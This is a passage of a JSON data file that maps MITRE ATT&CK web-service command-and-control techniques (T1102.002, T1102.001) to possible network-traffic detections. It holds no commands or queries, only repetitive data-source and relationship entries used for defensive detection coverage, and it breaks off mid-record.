"description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1102.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1102.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": 